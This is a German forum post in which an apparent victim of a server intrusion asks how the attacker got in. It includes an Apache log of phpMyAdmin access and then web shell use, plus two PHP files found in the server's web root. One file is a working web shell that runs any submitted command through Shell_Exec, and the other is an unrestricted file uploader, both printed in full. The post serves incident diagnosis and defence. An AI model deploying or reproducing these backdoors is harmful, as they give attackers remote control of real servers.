ich habe einen XP Pro Rechner mit fester IP als Webserver laufen. ich weiß alleine das ist eigentlich schon strafbar , aber es hat sich halt so ergeben.
um das teil abzusichern hab ich den antivir und die windows eigene firewall laufen. alle unnötigen dienste sind deaktiviert und die "unsichern user" sind gelöscht
leider schleicht sich aber hier und da nochmal ein backdoor programm ein und ich bin mir nicht so ganz im klaren, wie das vonstatten geht. bei meiner letzten trojaner und backdoor beseitigung bin ich darauf gestossen, dass eine datei mit gefährlichem inhalt im htdocs verzeichniss meines webservers liegt. desweiteren hatte ich mehrere gruselige dateien in dem ordner mysql/data .
der angreifer war wohl schon auf meinem rechner unterwegs, denn mittlerweile war schon ein neuer user auf der maschine angelegt :-/
verständlicher weiße hab ich nicht gerade ein großes interesse, dass da weiter einer sein unwesen auf meinem rechner treibt, deshalb füge ich diesem eintrag mal den inhalt meiner apache log an und zwei scripte von php dateien, welche in meinem root verzeichniss lagen.
es wäre nett, wenn mir einer einen tipp geben kann, wie ich die sicherheitslücke (sofern es denn eine ist) schliessen kann um solche aktivitäten in zukunft zu vermeiden.
pcmd.php
<? $cmd = $_REQUEST["-cmd"]; ?><html><head><title>cmd.php</title></head><body bgcolor=#000000 text=#ffffff onLoad="document.forms[0].elements[-cmd].focus()"><form method=POST><br><input type=TEXT name="-cmd" size=64 value="<?=$cmd?>" style="background:#000000;color:#ffffff;"><hr><pre><? if($cmd != "") print Shell_Exec($cmd); ?></pre></form></body></html>
up.php
<html><head><title>Upload</title></head><body><form action="up.php" method="post" enctype="multipart/form-data" name="img_form"><input name="file" type="file" size="39"><br><input type="submit" name="Submit" value="save"></form><? if(isset($_FILES["file"])) { $tempname = $_FILES["file"]["tmp_name"]; $name = $_FILES["file"]["name"];
\
copy("$tempname", "$name"); } ?></body></html>
apache log
131.234.65.27 - - [07/Jun/2005:14:06:54 +0200] "GET /phpmyadmin/ HTTP/1.1" 401 2485
131.234.65.27 - pma [07/Jun/2005:14:06:57 +0200] "GET /phpmyadmin/ HTTP/1.1" 200 2805
131.234.65.27 - pma [07/Jun/2005:14:06:57 +0200] "GET /phpmyadmin/css/phpmyadmin.css.php?lang=de-utf-8&js_frame=right HTTP/1.1" 200 10848
131.234.65.27 - pma [07/Jun/2005:14:06:59 +0200] "GET /phpmyadmin/queryframe.php?lang=de-utf-8&server=1&collation_connection=utf8_general_ci&hash=6fe81601acd5b4e39fe5832ce5f975e61118146017 HTTP/1.1" 200 9038
131.234.65.27 - pma [07/Jun/2005:14:07:00 +0200] "GET /phpmyadmin/left.php?lang=de-utf-8&server=1&collation_connection=utf8_general_ci&hash=6fe81601acd5b4e39fe5832ce5f975e61118146017 HTTP/1.1" 200 1934
131.234.65.27 - pma [07/Jun/2005:14:07:01 +0200] "GET /phpmyadmin/css/phpmyadmin.css.php?js_frame=left&num_dbs=0 HTTP/1.1" 200 2327
131.234.65.27 - pma [07/Jun/2005:14:07:01 +0200] "GET /phpmyadmin/css/phpmyadmin.css.php?lang=de-utf-8&js_frame=left&num_dbs=0 HTTP/1.1" 200 2327
131.234.65.27 - pma [07/Jun/2005:14:07:01 +0200] "GET /phpmyadmin/css/phpmyadmin.css.php?lang=de-utf-8&js_frame=right&js_isDOM=1 HTTP/1.1" 200 11575
131.234.65.27 - pma [07/Jun/2005:14:07:00 +0200] "GET /phpmyadmin/main.php?lang=de-utf-8&server=1&collation_connection=utf8_general_ci HTTP/1.1" 200 58984
131.234.65.27 - - [07/Jun/2005:14:07:01 +0200] "GET /phpmyadmin/themes/original/img/logo_left.png HTTP/1.1" 200 4424
131.234.65.27 - - [07/Jun/2005:14:07:01 +0200] "GET /phpmyadmin/themes/original/img/b_selboard.png HTTP/1.1" 200 274
131.234.65.27 - - [07/Jun/2005:14:07:02 +0200] "GET /phpmyadmin/themes/original/img/b_home.png HTTP/1.1" 200 370
131.234.65.27 - - [07/Jun/2005:14:07:02 +0200] "GET /phpmyadmin/themes/original/img/s_loggoff.png HTTP/1.1" 200 262
131.234.65.27 - - [07/Jun/2005:14:07:02 +0200] "GET /phpmyadmin/themes/original/img/spacer.png HTTP/1.1" 200 153
131.234.65.27 - - [07/Jun/2005:14:07:02 +0200] "GET /phpmyadmin/themes/original/img/vertical_line.png HTTP/1.1" 200 83
131.234.65.27 - - [07/Jun/2005:14:07:02 +0200] "GET /phpmyadmin/themes/original/img/logo_right.png HTTP/1.1" 200 5658
131.234.65.27 - - [07/Jun/2005:14:07:02 +0200] "GET /phpmyadmin/themes/original/img/b_help.png HTTP/1.1" 200 229
131.234.65.27 - - [07/Jun/2005:14:07:02 +0200] "GET /phpmyadmin/themes/original/img/b_newdb.png HTTP/1.1" 200 408
131.234.65.27 - - [07/Jun/2005:14:07:02 +0200] "GET /phpmyadmin/themes/original/img/s_status.png HTTP/1.1" 200 313
131.234.65.27 - - [07/Jun/2005:14:07:03 +0200] "GET /phpmyadmin/themes/original/img/s_process.png HTTP/1.1" 200 362
131.234.65.27 - - [07/Jun/2005:14:07:03 +0200] "GET /phpmyadmin/themes/original/img/s_asci.png HTTP/1.1" 200 254
131.234.65.27 - - [07/Jun/2005:14:07:03 +0200] "GET /phpmyadmin/themes/original/img/b_docs.png HTTP/1.1" 200 292
131.234.65.27 - - [07/Jun/2005:14:07:03 +0200] "GET /phpmyadmin/themes/original/img/s_reload.png HTTP/1.1" 200 245
131.234.65.27 - - [07/Jun/2005:14:07:03 +0200] "GET /phpmyadmin/themes/original/img/s_rights.png HTTP/1.1" 200 512
131.234.65.27 - - [07/Jun/2005:14:07:03 +0200] "GET /phpmyadmin/themes/original/img/s_db.png HTTP/1.1" 200 285
131.234.65.27 - - [07/Jun/2005:14:07:03 +0200] "GET /phpmyadmin/themes/original/img/b_export.png HTTP/1.1" 200 313
131.234.65.27 - - [07/Jun/2005:14:07:03 +0200] "GET /phpmyadmin/themes/original/img/s_passwd.png HTTP/1.1" 200 505
131.234.65.27 - - [07/Jun/2005:14:07:03 +0200] "GET /phpmyadmin/themes/original/img/s_lang.png HTTP/1.1" 200 422
131.234.65.27 - - [07/Jun/2005:14:07:03 +0200] "GET /phpmyadmin/themes/original/img/b_info.png HTTP/1.1" 200 234
131.234.65.27 - - [07/Jun/2005:14:07:03 +0200] "GET /phpmyadmin/themes/original/img/b_sqlhelp.png HTTP/1.1" 200 287
131.234.65.27 - - [07/Jun/2005:14:07:03 +0200] "GET /phpmyadmin/themes/original/img/s_theme.png HTTP/1.1" 200 737
131.234.65.27 - - [07/Jun/2005:14:07:03 +0200] "GET /phpmyadmin/themes/original/img/php_sym.png HTTP/1.1" 200 249
131.234.65.27 - - [07/Jun/2005:14:07:03 +0200] "GET /phpmyadmin/themes/original/img/s_vars.png HTTP/1.1" 200 306
131.234.65.27 - pma [07/Jun/2005:14:07:21 +0200] "GET /phpmyadmin/phpinfo.php?lang=de-utf-8&server=1&collation_connection=utf8_general_ci HTTP/1.1" 200 45762
131.234.65.27 - pma [07/Jun/2005:14:07:22 +0200] "GET /phpmyadmin/phpinfo.php?=PHPE9568F34-D428-11d2-A769-00AA001ACF42 HTTP/1.1" 200 4644
131.234.65.27 - pma [07/Jun/2005:14:07:22 +0200] "GET /phpmyadmin/phpinfo.php?=PHPE9568F35-D428-11d2-A769-00AA001ACF42 HTTP/1.1" 200 2146
131.234.65.27 - pma [07/Jun/2005:14:07:44 +0200] "GET /phpmyadmin/server_status.php?lang=de-utf-8&server=1&collation_connection=utf8_general_ci HTTP/1.1" 200 64732
131.234.65.27 - pma [07/Jun/2005:14:07:45 +0200] "GET /phpmyadmin/css/phpmyadmin.css.php?lang=de-utf-8&js_frame=right&js_isDOM=1 HTTP/1.1" 200 11575
131.234.65.27 - - [07/Jun/2005:14:07:46 +0200] "GET /phpmyadmin/themes/original/img/s_host.png HTTP/1.1" 200 316
131.234.65.27 - - [07/Jun/2005:14:07:47 +0200] "GET /phpmyadmin/themes/original/img/s_db.png HTTP/1.1" 304 -
131.234.65.27 - - [07/Jun/2005:14:07:47 +0200] "GET /phpmyadmin/themes/original/img/vertical_line.png HTTP/1.1" 304 -
131.234.65.27 - - [07/Jun/2005:14:07:47 +0200] "GET /phpmyadmin/themes/original/img/s_status.png HTTP/1.1" 304 -
131.234.65.27 - - [07/Jun/2005:14:07:47 +0200] "GET /phpmyadmin/themes/original/img/s_vars.png HTTP/1.1" 304 -
131.234.65.27 - - [07/Jun/2005:14:07:47 +0200] "GET /phpmyadmin/themes/original/img/s_asci.png HTTP/1.1" 304 -
131.234.65.27 - - [07/Jun/2005:14:07:48 +0200] "GET /phpmyadmin/themes/original/img/s_rights.png HTTP/1.1" 304 -
131.234.65.27 - - [07/Jun/2005:14:07:48 +0200] "GET /phpmyadmin/themes/original/img/s_process.png HTTP/1.1" 304 -
131.234.65.27 - - [07/Jun/2005:14:07:51 +0200] "GET /phpmyadmin/themes/original/img/b_export.png HTTP/1.1" 304 -
131.234.65.27 - pma [07/Jun/2005:14:08:02 +0200] "POST /phpmyadmin/left.php HTTP/1.1" 200 14937
131.234.65.27 - - [07/Jun/2005:14:08:02 +0200] "GET /phpmyadmin/themes/original/img/b_sbrowse.png HTTP/1.1" 200 197
131.234.65.27 - pma [07/Jun/2005:14:08:02 +0200] "GET /phpmyadmin/css/phpmyadmin.css.php?js_frame=left&num_dbs=0 HTTP/1.1" 200 2327
131.234.65.27 - pma [07/Jun/2005:14:08:03 +0200] "GET /phpmyadmin/css/phpmyadmin.css.php?lang=de-utf-8&js_frame=right&js_isDOM=1 HTTP/1.1" 200 11575
131.234.65.27 - pma [07/Jun/2005:14:08:02 +0200] "GET /phpmyadmin/db_details_structure.php?lang=de-utf-8&server=1&collation_connection=utf8_general_ci&db=mysql HTTP/1.1" 200 113574
131.234.65.27 - - [07/Jun/2005:14:08:06 +0200] "GET /phpmyadmin/libraries/functions.js HTTP/1.1" 200 36324
131.234.65.27 - - [07/Jun/2005:14:08:06 +0200] "GET /phpmyadmin/themes/original/img/b_props.png HTTP/1.1" 200 294
131.234.65.27 - - [07/Jun/2005:14:08:06 +0200] "GET /phpmyadmin/themes/original/img/b_sql.png HTTP/1.1" 200 322
131.234.65.27 - - [07/Jun/2005:14:08:06 +0200] "GET /phpmyadmin/themes/original/img/b_search.png HTTP/1.1" 200 605
131.234.65.27 - - [07/Jun/2005:14:08:06 +0200] "GET /phpmyadmin/themes/original/img/bd_select.png HTTP/1.1" 200 524
131.234.65.27 - - [07/Jun/2005:14:08:06 +0200] "GET /phpmyadmin/themes/original/img/bd_browse.png HTTP/1.1" 200 265
131.234.65.27 - - [07/Jun/2005:14:08:06 +0200] "GET /phpmyadmin/themes/original/img/b_deltbl.png HTTP/1.1" 200 364
131.234.65.27 - - [07/Jun/2005:14:08:07 +0200] "GET /phpmyadmin/themes/original/img/b_select.png HTTP/1.1" 200 540
131.234.65.27 - - [07/Jun/2005:14:08:07 +0200] "GET /phpmyadmin/themes/original/img/b_empty.png HTTP/1.1" 200 298
131.234.65.27 - - [07/Jun/2005:14:08:07 +0200] "GET /phpmyadmin/themes/original/img/b_print.png HTTP/1.1" 200 574
131.234.65.27 - - [07/Jun/2005:14:08:07 +0200] "GET /phpmyadmin/themes/original/img/arrow_ltr.png HTTP/1.1" 200 277
131.234.65.27 - - [07/Jun/2005:14:08:07 +0200] "GET /phpmyadmin/themes/original/img/b_tblanalyse.png HTTP/1.1" 200 296
131.234.65.27 - - [07/Jun/2005:14:08:07 +0200] "GET /phpmyadmin/themes/original/img/b_newtbl.png HTTP/1.1" 200 409
131.234.65.27 - - [07/Jun/2005:14:08:07 +0200] "GET /phpmyadmin/themes/original/img/b_comment.png HTTP/1.1" 200 552
131.234.65.27 - - [07/Jun/2005:14:08:07 +0200] "GET /phpmyadmin/themes/original/img/b_edit.png HTTP/1.1" 200 451
131.234.65.27 - - [07/Jun/2005:14:08:07 +0200] "GET /phpmyadmin/themes/original/img/b_insrow.png HTTP/1.1" 200 283
131.234.65.27 - - [07/Jun/2005:14:08:07 +0200] "GET /phpmyadmin/themes/original/img/b_pdfdoc.png HTTP/1.1" 200 298
131.234.65.27 - - [07/Jun/2005:14:08:07 +0200] "GET /phpmyadmin/themes/original/img/item_ltr.png HTTP/1.1" 200 173
131.234.65.27 - - [07/Jun/2005:14:08:07 +0200] "GET /phpmyadmin/themes/original/img/bd_empty.png HTTP/1.1" 200 298
131.234.65.27 - - [07/Jun/2005:14:08:07 +0200] "GET /phpmyadmin/themes/original/img/b_drop.png HTTP/1.1" 200 311
131.234.65.27 - - [07/Jun/2005:14:08:08 +0200] "GET /phpmyadmin/themes/original/img/b_browse.png HTTP/1.1" 200 265
131.234.65.27 - pma [07/Jun/2005:14:08:09 +0200] "GET /phpmyadmin/db_details.php?lang=de-utf-8&server=1&collation_connection=utf8_general_ci&db=mysql&goto=db_details_structure.php&db_query_force=1 HTTP/1.1" 200 17063
131.234.65.27 - pma [07/Jun/2005:14:08:10 +0200] "GET /phpmyadmin/css/phpmyadmin.css.php?lang=de-utf-8&js_frame=right&js_isDOM=1 HTTP/1.1" 200 11575
131.234.65.27 - - [07/Jun/2005:14:08:10 +0200] "GET /phpmyadmin/themes/original/img/b_help.png HTTP/1.1" 304 -
131.234.65.27 - pma [07/Jun/2005:14:08:17 +0200] "GET /phpmyadmin/css/phpmyadmin.css.php?lang=de-utf-8&js_frame=right&js_isDOM=1 HTTP/1.1" 200 11575
131.234.65.27 - - [07/Jun/2005:14:08:17 +0200] "GET /phpmyadmin/themes/original/img/logo_right.png HTTP/1.1" 304 -
131.234.65.27 - - [07/Jun/2005:14:08:17 +0200] "GET /phpmyadmin/themes/original/img/b_newdb.png HTTP/1.1" 304 -
131.234.65.27 - pma [07/Jun/2005:14:08:17 +0200] "GET /phpmyadmin/left.php?lang=de-utf-8&server=1&collation_connection=utf8_general_ci&hash=6fe81601acd5b4e39fe5832ce5f975e61118146017 HTTP/1.1" 200 1934
131.234.65.27 - - [07/Jun/2005:14:08:18 +0200] "GET /phpmyadmin/themes/original/img/s_reload.png HTTP/1.1" 304 -
131.234.65.27 - - [07/Jun/2005:14:08:18 +0200] "GET /phpmyadmin/themes/original/img/s_passwd.png HTTP/1.1" 304 -
131.234.65.27 - pma [07/Jun/2005:14:08:18 +0200] "GET /phpmyadmin/css/phpmyadmin.css.php?js_frame=left&num_dbs=0 HTTP/1.1" 200 2327
131.234.65.27 - - [07/Jun/2005:14:08:18 +0200] "GET /phpmyadmin/themes/original/img/b_info.png HTTP/1.1" 304 -
131.234.65.27 - - [07/Jun/2005:14:08:18 +0200] "GET /phpmyadmin/themes/original/img/s_lang.png HTTP/1.1" 304 -
131.234.65.27 - pma [07/Jun/2005:14:08:16 +0200] "POST /phpmyadmin/read_dump.php HTTP/1.1" 200 65169
131.234.65.27 - - [07/Jun/2005:14:08:19 +0200] "GET /phpmyadmin/themes/original/img/s_theme.png HTTP/1.1" 304 -
131.234.65.27 - - [07/Jun/2005:14:08:19 +0200] "GET /phpmyadmin/themes/original/img/php_sym.png HTTP/1.1" 304 -
131.234.65.27 - pma [07/Jun/2005:14:08:19 +0200] "GET /phpmyadmin/queryframe.php?lang=de-utf-8&server=1&collation_connection=utf8_general_ci&hash=6fe81601acd5b4e39fe5832ce5f975e61118146017 HTTP/1.1" 200 9038
131.234.65.27 - - [07/Jun/2005:14:08:20 +0200] "GET /phpmyadmin/themes/original/img/logo_left.png HTTP/1.1" 304 -
131.234.65.27 - - [07/Jun/2005:14:08:20 +0200] "GET /phpmyadmin/themes/original/img/b_selboard.png HTTP/1.1" 304 -
131.234.65.27 - - [07/Jun/2005:14:08:20 +0200] "GET /phpmyadmin/themes/original/img/b_sqlhelp.png HTTP/1.1" 304 -
131.234.65.27 - pma [07/Jun/2005:14:08:20 +0200] "GET /phpmyadmin/css/phpmyadmin.css.php?lang=de-utf-8&js_frame=left&num_dbs=0 HTTP/1.1" 200 2327
131.234.65.27 - pma [07/Jun/2005:14:08:22 +0200] "POST /phpmyadmin/left.php HTTP/1.1" 200 14937
131.234.65.27 - pma [07/Jun/2005:14:08:23 +0200] "GET /phpmyadmin/css/phpmyadmin.css.php?js_frame=left&num_dbs=0 HTTP/1.1" 200 2327
131.234.65.27 - pma [07/Jun/2005:14:08:23 +0200] "GET /phpmyadmin/css/phpmyadmin.css.php?lang=de-utf-8&js_frame=right&js_isDOM=1 HTTP/1.1" 200 11575
131.234.65.27 - pma [07/Jun/2005:14:08:23 +0200] "GET /phpmyadmin/db_details_structure.php?lang=de-utf-8&server=1&collation_connection=utf8_general_ci&db=mysql HTTP/1.1" 200 113574
131.234.65.27 - pma [07/Jun/2005:14:08:27 +0200] "GET /phpmyadmin/db_details.php?lang=de-utf-8&server=1&collation_connection=utf8_general_ci&db=mysql&goto=db_details_structure.php&db_query_force=1 HTTP/1.1" 200 17063
131.234.65.27 - pma [07/Jun/2005:14:08:28 +0200] "GET /phpmyadmin/css/phpmyadmin.css.php?lang=de-utf-8&js_frame=right&js_isDOM=1 HTTP/1.1" 200 11575
131.234.65.27 - pma [07/Jun/2005:14:08:30 +0200] "GET /phpmyadmin/css/phpmyadmin.css.php?lang=de-utf-8&js_frame=right&js_isDOM=1 HTTP/1.1" 200 11575
131.234.65.27 - pma [07/Jun/2005:14:08:31 +0200] "GET /phpmyadmin/left.php?lang=de-utf-8&server=1&collation_connection=utf8_general_ci&hash=6fe81601acd5b4e39fe5832ce5f975e61118146017 HTTP/1.1" 200 1934
131.234.65.27 - pma [07/Jun/2005:14:08:31 +0200] "GET /phpmyadmin/css/phpmyadmin.css.php?js_frame=left&num_dbs=0 HTTP/1.1" 200 2327
131.234.65.27 - pma [07/Jun/2005:14:08:30 +0200] "POST /phpmyadmin/read_dump.php HTTP/1.1" 200 65012
131.234.65.27 - pma [07/Jun/2005:14:08:33 +0200] "GET /phpmyadmin/queryframe.php?lang=de-utf-8&server=1&collation_connection=utf8_general_ci&hash=6fe81601acd5b4e39fe5832ce5f975e61118146017 HTTP/1.1" 200 9038
131.234.65.27 - pma [07/Jun/2005:14:08:33 +0200] "GET /phpmyadmin/css/phpmyadmin.css.php?lang=de-utf-8&js_frame=left&num_dbs=0 HTTP/1.1" 200 2327
131.234.65.27 - - [07/Jun/2005:14:08:37 +0200] "GET /pcmd.php HTTP/1.1" 200 273
131.234.65.27 - - [07/Jun/2005:14:08:39 +0200] "POST /pcmd.php HTTP/1.1" 200 1769
131.234.65.27 - - [07/Jun/2005:14:09:36 +0200] "GET /up.php HTTP/1.1" 200 378
131.234.65.27 - - [07/Jun/2005:14:09:51 +0200] "POST /up.php HTTP/1.1" 200 378
131.234.65.27 - - [07/Jun/2005:14:10:17 +0200] "POST /up.php HTTP/1.1" 200 378